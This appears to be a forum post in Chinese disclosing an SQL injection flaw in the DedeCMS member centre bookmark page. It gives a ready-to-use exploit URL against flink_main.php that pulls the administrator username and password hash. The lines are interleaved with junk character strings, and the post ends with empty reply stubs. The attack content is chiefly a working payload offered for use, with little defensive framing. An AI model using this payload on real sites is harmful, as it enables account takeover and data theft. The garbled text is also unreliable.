DedeCMS会员中心SQL注射漏洞; Q; ?; p) w( B
需要magic_quotes_gpc = Off
; b5 L3 @* m' {+ m会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
. w( r( B V0 k/ k# p5 ]: }/ ?' n
" w8 ^$ M& y6 L/ _4 u7 f7 xDedeCMS会员中心书签管理SQL注射漏洞
, V6 T8 r9 w9 e/ c2 S5 Z) }成功利用该漏洞可获得管理员密码
5 h. {& l/ h6 X; T) b5 |; [
. D. i* ?# V3 @7 B会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
S4 ]$ u, o/ J$ x & ^' i3 E8 t1 a8 e; j* h6 G
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r% v" z) d* Z. t ?% j. O( G% @
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59